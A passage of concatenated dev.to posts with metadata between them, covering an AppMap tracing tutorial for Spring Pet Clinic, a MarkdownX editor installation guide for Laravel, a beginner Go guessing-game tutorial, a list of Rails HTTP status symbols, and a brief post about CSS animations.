- Create `appmap.yml` and configure your project name and primary package names.
### 2. Add additional package names, such as `org.springframework.web`, to `appmap.yml`
Here's an example [`appmap.yml`](https://github.com/land-of-apps/spring-petclinic/tree/appmap-e2e/appmap.yml) that I use with my fork of the Spring Pet Clinic.
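As a rough sketch of what that file can look like (the package paths below are illustrative, based on the Pet Clinic layout, so adjust them to your own project):

```yaml
# appmap.yml (illustrative example)
name: spring-petclinic
packages:
  - path: org.springframework.samples.petclinic  # your application code
  - path: org.springframework.web                # framework package to trace
```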
### 3. Record the AppMap of code execution
You have several choices of how to record your code:
**Option 1: Test case(s)**
If you have JUnit or TestNG tests that cover your app, run your tests with the AppMap Gradle or Maven integration enabled.
**Option 2: Record user actions and API requests**
If you don't have a test that does what you need, you can use your app and get an AppMap of all the actions you perform. This is called “remote recording,” and to use it, you run your web server with the flag `-javaagent:appmap.jar`. If your app is an API server, run the server and send API requests. Either way, you'll get an `appmap.json` file when the server exits.
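For example (the jar paths here are placeholders for wherever your agent and application jars actually live), launching a Spring Boot app with the agent attached could look like:

```
java -javaagent:appmap.jar -jar target/your-app.jar
```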
**Option 3: Record the entire server run, including startup and shutdown**
The AppMap Java agent supports a System property `appmap.recording.auto`. If you set this property
to true, the server process is recorded from start to finish, and the results are written to a timestamped `appmap.json` file when the process exits.
### 4. View the diagrams
The AppMap extension for VSCode and IntelliJ enables you to open any `*.appmap.json` and explore it visually. To open AppMaps in the code editor, open the AppMaps “Tool Window” (IntelliJ) or AppMaps sidebar (VSCode).
Click on an AppMap to view the Dependency map in your code editor window. From there, you can search,
browse, and drill down into the Trace view.
## Demo - Pet Clinic + org.springframework.web
As I indicated above, AppMap is a flexible tool and there are several ways to use it. Let’s start with a fairly simple, but quite useful and illustrative example.
A Spring Controller is a pretty complex mixture of methods and annotations - even the simple Pet Clinic “OwnerController” has at least 5 different annotations used in multiple different ways. Code like this is powerful, but unlike “normal” procedural or functional code, there’s no information in the code about how the functions are used, how they fit together, or which ones are used in a particular use case.
```java
@Controller
class OwnerController {
private static final String VIEWS_OWNER_CREATE_OR_UPDATE_FORM = "owners/createOrUpdateOwnerForm";
private final OwnerRepository owners;
private VisitRepository visits;
public OwnerController(OwnerRepository clinicService, VisitRepository visits) {
this.owners = clinicService;
this.visits = visits;
}
@InitBinder
public void setAllowedFields(WebDataBinder dataBinder) {
dataBinder.setDisallowedFields("id");
}
@GetMapping("/owners/new")
public String initCreationForm(Map<String, Object> model) {
Owner owner = new Owner();
model.put("owner", owner);
return VIEWS_OWNER_CREATE_OR_UPDATE_FORM;
}
@PostMapping("/owners/new")
public String processCreationForm(@Valid Owner owner, BindingResult result) {
if (result.hasErrors()) {
return VIEWS_OWNER_CREATE_OR_UPDATE_FORM;
}
else {
this.owners.save(owner);
return "redirect:/owners/" + owner.getId();
}
}
@GetMapping("/owners/find")
public String initFindForm(Map<String, Object> model) {
model.put("owner", new Owner());
return "owners/findOwners";
}
	// ... remaining handler methods trimmed for brevity ...
}
```
The `org.springframework.web` package orchestrates these snippets of Java code based on their annotations.
To get a map of how an Owner request works, I’ll run the Pet Clinic with remote recording enabled, then use the AppMap extension for IntelliJ to create a recording of a web request. This is a bit easier to watch than to explain, so check out the video in the original post for a walkthrough of all this.
To recreate this yourself, check out the appmap-e2e branch of
[https://github.com/land-of-apps/spring-petclinic](https://github.com/land-of-apps/spring-petclinic)
To record and review your own runtime code maps directly in your code editor, download the free AppMap plugin for JetBrains here: [https://plugins.jetbrains.com/plugin/16701-appmap](https://plugins.jetbrains.com/plugin/16701-appmap) | kgilpin |
807,981 | MarkdownX Editor 🎉 | Our MarkdownX editor is officially live and available on the DevDojo. It's also available for you to... | 0 | 2021-08-30T12:41:35 | https://devdojo.com/tnylea/markdownx-editor | markdown, laravel, tailwindcss, saas | Our MarkdownX editor is officially live and available on the DevDojo. It's also available for you to use in your [TallStack](https://tallstack.dev) applications 🍻.
If this is your first time hearing about the [MarkdownX Editor](https://devdojo.com/markdownx), continue reading to learn more about how it can make writing in Markdown easier and more fun than ever before.
> MarkdownX became a top-4 product of the day on [ProductHunt](https://www.producthunt.com/posts/markdownx) 😻
## What is MarkdownX
MarkdownX is like a `<textarea>` element with super powers ✨. It is a text editor with a beautiful interface that makes it easy for users to write in Markdown. The component has a pretty sweet dropdown that allows you to easily upload images, add lists, embed videos, and so much more!
A month ago we posted a tweet about a new editor we were building and it got a pretty huge response with nearly 500 likes and 50 retweets 🤯
[](https://twitter.com/tnylea/status/1419059051430825986)
That set things in motion and we started working on a version that could be used with any [Tallstack](https://tallstack.dev) application. 🙌.
I'll show you the steps below 👇 on how to install this in a new Tallstack app.
## 1. 🔧 Create a new Laravel App
The first step is creating a new Laravel application. If you already have an existing Tallstack application, you can skip ahead to step 3.
```
laravel new mdx
```
In this example, I'll install a new Laravel app in a folder named `mdx`.
Then, go into that directory `cd mdx`, and we can move to the next step.
## 2. 🔩 Installing the Tallstack Pre-set
The Tallstack preset allows us to add [TailwindCSS](https://tailwindcss.com), [Alpine](https://alpinejs.dev), and [Livewire](https://laravel-livewire.com) in our new application with a few simple commands. You can find that preset here: [https://github.com/laravel-frontend-presets/tall](https://github.com/laravel-frontend-presets/tall).
Let's run those commands in our new application:
```
composer require livewire/livewire laravel-frontend-presets/tall
php artisan ui tall
npm install
npm run dev
```
After we have run those commands, we should be able to visit our new site:

And we should have a new [Tallstack](https://tallstack.dev) application in front of us.
> note: if you get an application key error, you may also need to run `php artisan key:generate`.
Next up, we'll be moving the component files to our new application.
## 3. 🧩 Adding the MarkdownX Editor
Adding this component to your project is literally as easy as **1**, **2**, **3**. Because that's how many files the MarkdownX editor includes. Here are those files:
1. **Controller** - app/Http/Livewire/MarkdownX.php
2. **View** - resources/views/livewire/markdown-x.blade.php
3. **Config** - config/markdownx.php
After downloading a copy of the latest MarkdownX editor, you will need to move those files 👆 to their appropriate location in your Laravel application.
> Note: make sure to run `php artisan storage:link`, if you want to test out image uploading. The MarkdownX storage uses the local public disk by default, but you can change this in the config 😉.
After you have done this, we are now ready to test it out in our new application.
## 🧪 Test out the Editor
To test the editor in our new app we are going to modify the welcome page located at `resources/views/welcome.blade.php`, to look like this:
```
@extends('layouts.app')
@section('content')
<livewire:markdown-x />
@endsection
```
If we visit our application homepage we'll see the editor in front of us 🤘.

We can now drag-and-drop images, add videos, lists, and a bunch of other cool things that make writing more fun and easier than ever before.
Be sure to check out the official new landing page for [MarkdownX here](https://devdojo.com/markdownx) and the [documentation here](https://devdojo.com/markdownx). I hope you find this component useful in your next project, and I hope you continue to build awesome stuff 🤘. See you soon! | bobbyiliev |
808,048 | Build a simple guessing game in Golang. | A complete beginner’s guide Concept The player will guess a number between 0... | 0 | 2021-08-31T11:18:30 | https://dev.to/nagatodev/build-a-simple-guessing-game-in-golang-48ig | go, gamedev, webdev, programming | # A complete beginner’s guide
## Concept
The player will guess a number between 0 and 10. If their guess is correct, they win. Otherwise, the program will give the player a hint to either guess higher or lower depending on the correct number. The player will have three(3) shots at the game; if he guesses incorrectly three(3) times, the game would end.
## Golang
Simply put, [Go](https://golang.org/) is an open-source programming language that makes it easy to build simple, reliable, and efficient software.
In this piece, you will learn how to make a simple guessing game in [Golang](https://golang.org/).
## Getting Started With Golang
To start with, you will need to install Golang on your computer. If you don’t already have it installed, you can do this from the [Golang website](https://golang.org/).
Once you are done with the installation, open the Command Prompt on Windows, or the Terminal on Mac and Linux. Then change directory (`cd`) into the folder where you want to store your guessing game.
Create the directory for your guessing game
```
mkdir Guess
```
Move into the new Guess directory
```
cd Guess
```
Initialize your project with a go.mod file. Make sure you replace `username` with your GitHub username.
```
go mod init github.com/username/Guess
```
Create a new file named guess.go
```
touch guess.go
```
You have now successfully installed ‘go’ and also set up your guessing game file.
Now, open the guess.go file with a text/code editor on your device. I use [VS Code](https://code.visualstudio.com/). Windows comes with Notepad pre-installed. Mac OS includes TextEdit. Linux users can use [Vim](https://www.vim.org/). You can also download other text editors like [sublime text](https://www.sublimetext.com/) or [atom](https://atom.io/).
> Now let’s get started with coding

## Creating the Guessing game
The instructions for this tutorial will be included in the code itself as comments. In Golang, you make comments with double forward slashes.
**Note**: a clean version of the code, without comments, is included below if you just want to jump straight to the game.
```go
// The first statement in a Go source file must be a package declaration. All the functions declared in this program become part of the declared package. Go programs start running in the main package; this tells the Go compiler to compile the package as an executable program.
// An executable simply means a file that contains a program capable of being executed, or run, on your computer.
package main

import (
	"fmt"       // the fmt package provides text formatting, input reading & output printing functions
	"math/rand" // the rand package allows you to generate random numbers
	"time"      // the time package provides time functionality, used here to seed the generator
)

func main() {
	fmt.Println("Game: Guess a number between 0 and 10")
	// This informs the player about how to play the game.
	fmt.Println("You have three(3) tries")

	// generate a random number
	source := rand.NewSource(time.Now().UnixNano())
	// The default number generator is predictable, so it will produce the same sequence of numbers each time. To produce a varying sequence, give it a seed that changes (in this case: the current time). Note that this is not safe to use for random numbers you want to be secret; use crypto/rand for those.
	randomizer := rand.New(source)
	secretNumber := randomizer.Intn(10)
	// Intn(10) generates numbers from 0 to 9 (the upper bound is exclusive). If you want to change the range, change the value 10 to a higher or lower value.

	var guess int
	// this is one form of declaration in Go; you have to add the type of the variable being declared. A bare "var guess" without the type won't work.

	for try := 1; try <= 3; try++ {
		// declaring the conditions for the for loop; the shorthand form of declaring a variable was used here. With declare-and-initialize ':=' you declare and assign a value in one step, and Go automatically infers the type of the variable since you already assigned a value to it.
		fmt.Printf("TRIAL %d\n", try)
		// print out the number of times the player has made a guess
		fmt.Println("Please enter your number")
		// the program will prompt the player to make a guess and enter a number
		fmt.Scan(&guess)
		// this function makes it possible for the program to receive the input
		if guess < secretNumber {
			// if the guessed number is less than or greater than the correct number, give the player a hint
			fmt.Printf("Sorry, wrong guess; number is too small\n")
		} else if guess > secretNumber {
			fmt.Printf("Sorry, wrong guess; number is too large\n")
		} else {
			// print out the "You win" message when the player guesses the correct number
			fmt.Printf("You win!\n")
			break
		}
		if try == 3 {
			// if the number of tries is equal to 3, print game over and also the correct number
			fmt.Printf("Game over!!\n")
			fmt.Printf("The correct number is %d\n", secretNumber)
			break
		}
	}
}
```
Once you are done editing, save the program. Also, you can change whatever you want in your program. For example, you could increase the guessing range from 10 to 100 by changing the value passed to `Intn`. You could change the program’s response to the player’s actions in the `Println()` calls. You can do whatever you want, the game is yours now 🤗.
## Running Your Program
Open up the integrated terminal in VS Code, or the Command Prompt (Windows/Linux) or Terminal (Mac), depending on the choice of text editor you made above. Ensure you are still in the guessing game directory you created above. If you are not, navigate to it using the command below:
```
cd Guess
```
There are two methods that you can use to run your guessing game. **Build or Run**. Use either of the two.
1- *Build*
Type the following command
```
go build guess.go
```
You should see a new file in your Guess directory (folder) named `guess`
Then run
```
./guess
```
2- *Run*
Type the following command
```
go run guess.go
```
Regardless of the method you went with above, your game should now be running. Once it is, test it out! Play around with it a few times. Have fun!!
If you have any questions about this tutorial, feel free to drop them as a comment or send me a message on [LinkedIn](https://www.linkedin.com/in/faruq-abdulsalam) or [Twitter](https://twitter.com/_Ace_II/) and I will try my best to help you out.
Below is a version of the code without comments.
```go
package main

import (
	"fmt"
	"math/rand"
	"time"
)

func main() {
	fmt.Println("Game: Guess a number between 0 and 10")
	fmt.Println("You have three(3) tries")
	source := rand.NewSource(time.Now().UnixNano())
	randomizer := rand.New(source)
	secretNumber := randomizer.Intn(10)
	var guess int
	for try := 1; try <= 3; try++ {
		fmt.Printf("TRIAL %d\n", try)
		fmt.Println("Please enter your number")
		fmt.Scan(&guess)
		if guess < secretNumber {
			fmt.Printf("Sorry, wrong guess; number is too small\n")
		} else if guess > secretNumber {
			fmt.Printf("Sorry, wrong guess; number is too large\n")
		} else {
			fmt.Printf("You win!\n")
			break
		}
		if try == 3 {
			fmt.Printf("Game over!!\n")
			fmt.Printf("The correct number is %d\n", secretNumber)
			break
		}
	}
}
```
Bonus: if you are using VS Code, you can open the editor from your terminal by typing this simple command
```
code
```
Note: the `code` command must be installed in your PATH first. To do this, **press CMD + SHIFT + P, type "shell command", and select "Shell Command: Install 'code' command in PATH"**

| nagatodev |
808,070 | [note]Rails HTTP Code and Symbol mapping | ... | 0 | 2021-08-30T16:00:04 | https://dev.to/kevinluo201/note-rails-http-code-and-symbol-mapping-5ckl | ## References
* [Rack::Utils::HTTP_STATUS_CODES](https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L492)
* [https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L520](https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L520)
## HTTP status code symbols for Rails
Thanks to Cody Fauser for this list of HTTP response codes and their Ruby on Rails symbol mappings.
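As a quick illustration of where these symbol names come from, here is a small self-contained sketch that mirrors the transformation Rack applies to the status text (a simplified reimplementation for demonstration, not the actual Rack source):

```ruby
# Simplified sketch of how Rack derives Rails-style symbols from status text:
# downcase the message and replace spaces/hyphens with underscores.
HTTP_STATUS_CODES = {
  200 => 'OK',
  404 => 'Not Found',
  422 => 'Unprocessable Entity',
  503 => 'Service Unavailable',
}

SYMBOL_TO_STATUS_CODE = HTTP_STATUS_CODES.map { |code, text|
  [text.downcase.gsub(/\s|-/, '_').to_sym, code]
}.to_h

puts SYMBOL_TO_STATUS_CODE[:not_found]            # 404
puts SYMBOL_TO_STATUS_CODE[:unprocessable_entity] # 422
```

In a Rails controller, the symbol form reads more clearly than the bare integer, e.g. `render json: errors, status: :unprocessable_entity` rather than `status: 422`.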
## 1xx Informational
```ruby
100 :continue
101 :switching_protocols
102 :processing
```
## 2xx Success
```ruby
200 :ok
201 :created
202 :accepted
203 :non_authoritative_information
204 :no_content
205 :reset_content
206 :partial_content
207 :multi_status
226 :im_used
```
## 3xx Redirection
```ruby
300 :multiple_choices
301 :moved_permanently
302 :found
303 :see_other
304 :not_modified
305 :use_proxy
307 :temporary_redirect
```
## 4xx Client Error
```ruby
400 :bad_request
401 :unauthorized
402 :payment_required
403 :forbidden
404 :not_found
405 :method_not_allowed
406 :not_acceptable
407 :proxy_authentication_required
408 :request_timeout
409 :conflict
410 :gone
411 :length_required
412 :precondition_failed
413 :request_entity_too_large
414 :request_uri_too_long
415 :unsupported_media_type
416 :requested_range_not_satisfiable
417 :expectation_failed
422 :unprocessable_entity
423 :locked
424 :failed_dependency
426 :upgrade_required
```
## 5xx Server Error
```ruby
500 :internal_server_error
501 :not_implemented
502 :bad_gateway
503 :service_unavailable
504 :gateway_timeout
505 :http_version_not_supported
507 :insufficient_storage
510 :not_extended
``` | kevinluo201 | |
808,080 | In which I am cranky about the urban/rural divide | I just came back from a weeks-long trip to the American West. It was amazing, gorgeous. More... | 0 | 2021-08-30T21:58:14 | https://heidiwaterhouse.com/2021/08/30/in-which-i-am-cranky-about-the-urban-rural-divide/?utm_source=rss&utm_medium=rss&utm_campaign=in-which-i-am-cranky-about-the-urban-rural-divide | bestpractices, industry, life, personal | ---
title: In which I am cranky about the urban/rural divide
published: true
date: 2021-08-30 15:07:00 UTC
tags: Bestpractices,Industry,Life,Personal
canonical_url: https://heidiwaterhouse.com/2021/08/30/in-which-i-am-cranky-about-the-urban-rural-divide/?utm_source=rss&utm_medium=rss&utm_campaign=in-which-i-am-cranky-about-the-urban-rural-divide
---
I just came back from a weeks-long trip to the American West. It was amazing, gorgeous.


More pictures at my blogpost: https://heidiwaterhouse.com/2021/08/30/in-which-i-am-cranky-about-the-urban-rural-divide/
<figcaption>What I did on my summer vacation. Yellowstone, Idaho, Coral Pink Sands, Zion, Bryce Canyon, Monument Valley, Ship Rock</figcaption>
You know what all this beauty has in common? Besides mostly being protected wild areas?
Zero bars of cell phone signal. Or maybe like, two bars, depending on whether there was a mesa in the way. We drove almost all of it on state freeways, not interstates, and there was, let me emphasize, NO SIGNAL.
That’s fine by me. I was taking a vacation and don’t need my phone pestering me all the time. I had even downloaded a bunch of albums and playlists to stream to the car audio system.
I’m going to call out Amazon Music here, but none of them are good. I used to use Google Music, but I loathe YouTube music’s interface _very slightly_ more than the Amazon interface. And Spotify is fine, but I like actually owning and downloading music instead of streaming it, because I have this silly old-fashioned notion that if I have purchased something and downloaded it, I might want to, you know, provide that to the car.
The process goes like this.
1. Open Amazon Music App
2. Reject Car Mode, because I was the passenger.
3. Reject the offer I get to sign up for Unlimited Whatever Streaming. I get this offer EVERY TIME. There is no way I can find to permanently dismiss it. I do not want to stream my music.
4. Click the Library icon
5. Click the Albums icon
6. Swear and switch into “Offline Music”, because it keeps defaulting me to “Online Music”
7. Select album, say, James – La Petit Mort
8. Sing along
9. Become very startled by the next thing to happen, which is rather than the app thinking “yes, album played, good job me, now I stop”, it says, “I see you have played your own music. I will now construct a STREAMING STATION based on that and attempt to communicate over this-here roaming connection, because I have never considered acting like a music player, I am here to CURATE TASTE.”
10. Everyone in the car with me is subjected to my rant about app developers who have never considered offline mode.
And it wasn’t just the music player — I had trouble finding books I had downloaded to my phone because it evidently wanted to dial home to confirm something? My licenses? And it wasn’t just Amazon. Aura Picture Frame app — very cool, no queuing capabilities. Marriott Bonvoy app — why WOULDN’T anyone want to spend data loading gorgeous pictures of resorts in the Maldives if one was booking a room in St. George, Utah? CovidAwareMN — help, help! I can’t find a signal and I don’t know where we are, alert!
The two apps that did not piss me off were Snapchat, which let me take and queue images without a fuss, and Google Maps, which let me pre-download maps around destinations it thought I might be headed to.
Now, this could be just a whine about how my magical communicator device didn’t do what I wanted, but I think it’s actually a pretty fair indicator of a real problem we have in software development generally, and app development in particular. We assume that everyone has data the way we have data – boundless, essentially free, always on. That streaming is just the new way radio works.
But it’s not! Radio is one-to-many, and what we are building with our always-on assumptions doesn’t map to that. Data is not free. If you look at the cost of downloads in non-US countries, or even in non-metropolitan US, or even for people on pay-as-you-go cell plans, IT’S NOT FREE. It’s expensive. And every time we lazily write a back-and-forth communication as if it were just a database call, we’re costing someone money. Mostly someones who can least afford it.
I was joking on Twitter that I wanted to drop app developers into the middle of the American West for a week and see how they felt about their product then, and hey, it would probably be good for them to get some screen-free time, but the more I thought about it, the more I do want someone to be angry with me. Because when we had to call the EMTs, I was glad we were somewhere with phone signal. And when we checked into a hotel and the volunteer-fire-department alarm was going off, I learned that they couldn’t get reliable pager coverage to summon firefighters. At the risk of sounding catastrophic, global climate change is going to lead to a lot of situations where we need our apps to do basic things without being able to phone home. If my first-aid manual is in PDF, will I be able to access it without hitting Adobe servers?
When we talk about building robust systems, we are thinking about hardware, software, failovers, unavailable humans, mostly normal failures. But this is a normal failure that I never hear us talk about.
PS – I also got in a lot of starwatching. It was marvelously dark, and I was watching for the Leonids and also resenting all the microsatellites. Yes, I know they are supposed to bring internet access to more of the world, but holy wow, they are bright and distracting and maybe we could have thought that through better, design-wise. | wiredferret |
808,251 | 2 anos atrás eu não consegui aprender Java e isso me ensinou a respeitar o meu tempo | Você também pode ouvir esse artigo acessando pelo Pingback Essa semana nas lembranças de stories... | 0 | 2021-09-01T21:19:20 | https://dev.to/jeniblo_dev/2-anos-atras-eu-nao-consegui-aprender-java-e-isso-me-ensinou-a-respeitar-o-meu-tempo-abj | aprendizado, evolucao, dev | > *Você também pode ouvir esse artigo acessando pelo [Pingback](https://pingback.com/jeniblo_dev/2-anos-atras-eu-nao-consegui-aprender-java-e-isso-me-ensinou-a-respeitar-o-meu-tempo)*
This week, in my Instagram story memories, this image below from two years ago showed up: the first time I tried to learn Java.

For those who don't know, I started a degree in Information Systems in May 2019 without ever having seen anything about programming in my life, and yes, **I thought I could learn everything.** As soon as I started covering some basics, I wanted to jump straight into Java because it is a widely used language, so I started taking a course.
**That's when my first frustration came: I couldn't properly understand how things worked in Java, I couldn't learn, and each class became more terrifying.**
After talking to some more experienced people in the field, I decided to set Java aside and focus on improving my knowledge of logic. After that I ended up going down other study paths, focusing more on learning HTML, CSS, and JavaScript.
Now, in June of this year, I had the opportunity to go back to learning Java. That fear of not being able to learn again, of it not being for me, hit once more, but I went ahead, fear and all.
Today, two months after starting to study Java at my own rhythm and respecting my own learning pace, I realized it wasn't that scary thing it was for me 2 years ago, and this learning process has been very enjoyable.
I wanted to tell this story here because I know that, like me, many of you have tried to learn something and ended up feeling frustrated for not being able to advance and learn as you wanted, and at some point questioned whether you were really on the right path or whether it was for you.
And if there's one thing I learned from all this, it is: **respect your own pace and don't compare yourself to other people.** Learning is a continuous and individual evolution; some people can learn faster and skip steps, while others need to go slower and get to know the fundamentals better. These are unique learning processes, and there is no better or worse.
Maybe the reason you can't learn a certain concept or language right now is that you need to change your learning method, need to go slower, or are not yet ready to learn it and need more foundational knowledge.
Getting to know myself and understanding how my learning works helped me demand less of myself and understand that advancing one step at a time, at my own pace, will also take me where I want to go. At that moment 2 years ago, when I tried to learn Java for the first time, I was not yet prepared to learn that content, and there is nothing wrong with that.
And you, have you ever tried to learn something and it didn't work out? Tell me in the comments how it went =)
<hr>
### 🎧 Shall we chat?
* [Instagram](https://www.instagram.com/jeniblo_dev/)
* [Twitter](https://twitter.com/jeniblo_dev)
* Keep up with all my content on [Polywork](https://www.polywork.com/jeniblo_dev)
| jeniblo_dev |
808,252 | How to configure AWS SSO enabling access for a user in two different AWS accounts using a customized user-portal | “Challenges faced to find the solution of how to configure AWS SSO enabling access for a user in two... | 0 | 2021-08-30T17:33:44 | https://dev.to/aws-builders/how-to-configure-aws-sso-enabling-access-for-a-user-in-two-different-aws-accounts-using-a-customized-user-portal-5ao5 | awss3, awssso, awsrds, security | “Challenges faced to find the solution of how to configure AWS SSO enabling access for a user in two different AWS accounts using a customized user-portal”. I have checked different ways so that I can be able to access different accounts in the simplest way without having to login to all accounts again and again. I got the solution as users are able to login the accounts once using the switch role for IAM users feature of AWS or using AWS Single Sign-On service. The AWS Single Sign-On service is a short-term access or we can say it gives a user session-based access so the access key and secret key also get changed automatically. As per my requirement, I have chosen AWS Single Sign-On service. In terms of cost, the AWS Single Sign-On service has no charges.
AWS Single Sign-On (AWS SSO) is a cloud service that allows you to grant your users access to AWS resources, such as Amazon EC2 instances, across multiple AWS accounts. By default, AWS SSO now provides a directory that you can use to create users, organize them in groups, and set permissions across those groups. You can also grant the users that you create in AWS SSO permissions to applications such as Salesforce, Box, and Office 365. AWS SSO and its directory are available at no additional cost to you. To learn more, read the [AWS Single Sign-On](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) documentation.
In this post, you will learn how to configure AWS SSO to enable access for a user in two different AWS accounts using a customized user portal. Here I have used two AWS accounts, an S3 bucket, and an RDS database. I have enabled SSO and created a user, a group, and permission sets (s3fullaccess and rdsfullaccess). Users are able to access the accounts' S3 and RDS services with the appropriate permissions using the user portal URL.
# Prerequisites
You’ll need an Amazon Simple Storage Service and Amazon Relational Database Service for this post. [Getting started with Amazon Simple Storage Service](https://aws.amazon.com/s3/getting-started/) provides instructions on how to create a bucket in a simple storage service. [Getting started with Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_GettingStarted.htm) provides instructions on how to create a relational database. You’ll also need [AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/userguide/installing.html) (AWS CLI) installed and configured on your machine. For this blog, I assume that I have two AWS accounts in an organization(root account and sub-account), S3 bucket with file and RDS database.
# Architecture Overview
Diagram

The architectural diagrams show the overall deployment architecture with AWS S3, AWS RDS, AWS Single Sign-On and AWS Accounts.
# Solution overview
This blog post consists of the following phases:
1. Set up the identity source settings in the AWS Single Sign-On console
2. Create a user and a group, and assign a permission set to the group in AWS Single Sign-On
3. Verify the SSO invitation as the user and log in to the AWS accounts using MFA authentication with the SSO service
4. Test account access for the user from the management console and the command line
I have two AWS accounts in an organization (a root account and a sub-account), an S3 bucket with a file, and an RDS database, as shown below →




## Phase 1: Set up the identity source settings in the AWS Single Sign-On console
1. In the AWS Single Sign-On console, click on the AWS SSO option to enable it.



2. Choose your identity source: in the identity source settings, select the AWS SSO option. Other options are also available, such as Active Directory and an external identity provider. Click on the customize button and enter a user portal URL of your choice.





3. You can also adjust the multi-factor authentication settings to your requirements. I have configured users to be prompted every time they sign in, allowed both security authentication MFA types, and set the option to require sign-in with MFA only.



## Phase 2: Create a user and a group, and assign a permission set to the group in AWS Single Sign-On
1. In the dashboard, click on the users option. I have added a user named gargee with the email verification option, providing the required user details such as email ID, first name, and last name, and leaving the other options at their defaults.



2. Click on the create group option, specify the group name as S3andRDSaccess, and create it. Then select the group and add a user to it. The user "Gargee Bhatnagar" has been successfully added to the group.



3. Go to the AWS Accounts option and click on the permission sets tab. Create a custom permission set named S3andRDSaccess with a 12-hour session duration and AWS managed policies (S3fullaccess and RDSfullaccess), then create it.








4. In the AWS Organization tab, assign the users to all existing AWS accounts and assign the permission set to the group.




## Phase 3: Verify the SSO invitation as the user and log in to the AWS accounts using MFA authentication with the SSO service
1. In the email, accept the invitation and then open the user portal URL in the browser. Set a new password for the user login and configure MFA for the user's SSO login.








2. Click on the AWS account; you can see the user's access permissions along with console and command line links.


## Phase 4: Test account access for the user from the management console and the command line
1. For the gargee user, check access to S3 and RDS from the console. The EC2 console is not accessible for gargee and shows an API error.





2. For the other user, check access to S3 and RDS from the console; nothing is displayed because there is no data in S3 and RDS for that account.



3. For the gargee user, access from the command line. Run the “aws configure sso” command in the terminal and provide the required details, such as the start URL and region. Complete MFA to authenticate the request for command-line access.






4. You can see the two accounts available with the roles on them. Input the region, output format, and profile name. I have set up a profile for gargee and the other user. You can list the S3 buckets using the “aws s3 ls --profile gargee-access” command for a user with a profile name. You can also describe the RDS instance using the “aws rds describe-db-instances --db-instance-identifier database-testsso --profile gargee-access” command.
You can also check the configuration and the expiration of a session, along with the access key and secret key, in the AWS config files.
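For illustration, after completing this step the AWS CLI stores an SSO profile in `~/.aws/config`. A sketch of what such a profile can look like follows; the start URL and account ID below are hypothetical placeholders, not values from this walkthrough:

```ini
[profile gargee-access]
sso_start_url = https://my-portal.awsapps.com/start
sso_region = ap-south-1
sso_account_id = 111122223333
sso_role_name = S3andRDSaccess
region = ap-south-1
output = json
```

Any command run with `--profile gargee-access` then uses the short-lived credentials cached for this SSO session.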














5. After the AWS SSO configuration is deleted, the user portal URL is no longer accessible.


# Clean-up
Delete the resources created for this example: the Single Sign-On configuration, the RDS database, and the S3 bucket.
# Pricing
Here is a review of the pricing and estimated cost for this example:
For Relational Database Service →
Cost for USD 0.024 per db.t2.micro instance hour (or partial hour) running MySQL = $0.05
For Simple Storage Service →
Cost of APS3-Requests = $0.00
No charges for AWS Single Sign-On Service.
Total Cost = $(0.05+0.00) = $0.05
# Summary
In this post, I have shown you how to configure AWS SSO to enable access for a user in two different AWS accounts using a customized user portal.
For more details on the Single Sign-On service, check out Get started with AWS Single Sign-On by opening the [AWS Single Sign-On Service console](https://ap-south-1.console.aws.amazon.com/singlesignon/home?region=ap-south-1#/). To learn more, read the [AWS Single Sign-On documentation](https://docs.aws.amazon.com/singlesignon/?id=docs_gateway).
Thanks for reading!
Connect with me: [Linkedin](https://www.linkedin.com/in/gargee-bhatnagar-6b7223114) | bhatnagargargee |
256,261 | Create a new Promise in JavaScript? | This video covers how to create a new Promise in JavaScript and what are the states of a Promise. Yo... | 0 | 2020-03-20T16:30:27 | https://bonsaiilabs.com/create-promise | javascript, react, node, codenewbie | ---
canonical_url: https://bonsaiilabs.com/create-promise
---
This video covers how to create a new Promise in JavaScript and what are the states of a Promise.
You can access the code at https://bonsaiilabs.com/create-promise/
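As a minimal sketch of the idea the video covers (this snippet is my own illustration, not the code from the video): a Promise starts out *pending* and later settles exactly once into either the *fulfilled* or the *rejected* state.

```javascript
// A Promise is created with an executor that receives resolve and reject.
// Calling resolve moves the promise to the fulfilled state;
// calling reject moves it to the rejected state.
const wait = (ms) =>
  new Promise((resolve, reject) => {
    if (ms < 0) {
      reject(new Error("delay must be non-negative")); // rejected state
    } else {
      setTimeout(() => resolve(`done after ${ms}ms`), ms); // fulfilled state
    }
  });

wait(100).then((msg) => console.log(msg)); // logs "done after 100ms"
wait(-1).catch((err) => console.log(err.message)); // logs "delay must be non-negative"
```

Once settled, a Promise's state never changes again; any further `resolve` or `reject` calls are ignored.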
{% youtube RK_0h-slUIA %}
Subscribe for more videos on JavaScript with Visualization: https://www.youtube.com/channel/UC0yZBnRsD9JRqLXBkfGym0Q?sub_confirmation=1
| deekshasharma25 |
310,542 | Create Your Own Elegant Code Screenshots with Carbon | I often get asked how I make "those great screenshots" of my code that I share on social media and here on dev.to. The answer is simple: I use the website https://carbon.now.sh! | 0 | 2020-04-16T11:01:08 | https://dev.to/nas5w/create-your-own-elegant-code-screenshots-with-carbon-357l | productivity, career, javascript, programming | ---
title: Create Your Own Elegant Code Screenshots with Carbon
published: true
description: I often get asked how I make "those great screenshots" of my code that I share on social media and here on dev.to. The answer is simple: I use the website https://carbon.now.sh!
tags: productivity, career, javascript, programming
cover_image: https://dev-to-uploads.s3.amazonaws.com/i/3t1jn828shr1qn4xh3ew.png
---
I often get asked how I make "those great screenshots" of my code that I share on social media and here on dev.to. The answer is simple: I use the website https://carbon.now.sh!
Furthermore, Carbon has a VS Code extension that, when used, will send your currently-selected code over to the Carbon website ready for screenshotting.
Here's an example screenshot:

And here's one of the tweets I've shared that has performed well, largely due to the quality of the screenshot:
{% twitter 1248757906662711301 %}
You too can share tips and code clearly using Carbon!
Happy learning/teaching! | nas5w |
329,081 | Been a busy boy | I've just had a busy old weekend and managed to get my digital counter working with CSS animations.... | 0 | 2020-05-11T15:29:56 | https://drmsite.blogspot.com/2019/07/been-busy-boy.html | css, graphics, html, javascript | ---
title: Been a busy boy
published: true
date: 2019-07-29 11:02:00 UTC
tags: CSS,Graphics,HTML,JavaScript
canonical_url: https://drmsite.blogspot.com/2019/07/been-busy-boy.html
---
